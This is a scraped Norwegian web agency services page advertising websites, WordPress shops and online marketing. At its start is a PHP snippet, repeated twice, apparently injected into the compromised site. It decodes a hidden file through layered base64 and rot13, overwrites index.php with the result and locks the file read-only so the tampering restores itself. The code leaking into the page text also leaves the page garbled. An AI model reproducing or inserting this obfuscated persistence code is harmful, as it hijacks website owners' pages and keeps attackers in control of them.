$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } DinArt Data Norge | Tjenester

Hjemmeside

Vi leverer flotte hjemmesider som har det lille ekstra. Det beste av alt at vi kan tilby det til konkurransedyktige priser.

Vi strekker oss ekstra for å forstå ditt behov. På den måten kan vi sikre at vi velger den beste løsningen, til den optimale prisen. Slik at du blir ekstra fornøyd med resultatet.

Nettbutikk

Vi leverer nettbutikker for WordPress paltformen. Disse er svært rimelige å sette opp, samtidig som de fremstrår unike og spesialtilpasset ditt behov.

Løsningen passer veldig godt for bedrifter som i starten ikke har så mange produkter eller som ønsker å teste netthandel uten at det hindrer videre vekst på et senere tidspunkt.

 

  • betalingslosninger Integration

Markedsføring på nett

Vi hjelper deg med markedsføring på internett. Ved å bruke verktøy som Google Adwords, Facebook annonser og Instagram,

annonser kan vi hjelpe deg å nå dine foretrukne målgrupper med en nøyaktighet du tidligere bare kunne drømme om. Ta kontakt så finner vi en løsning som passer for deg.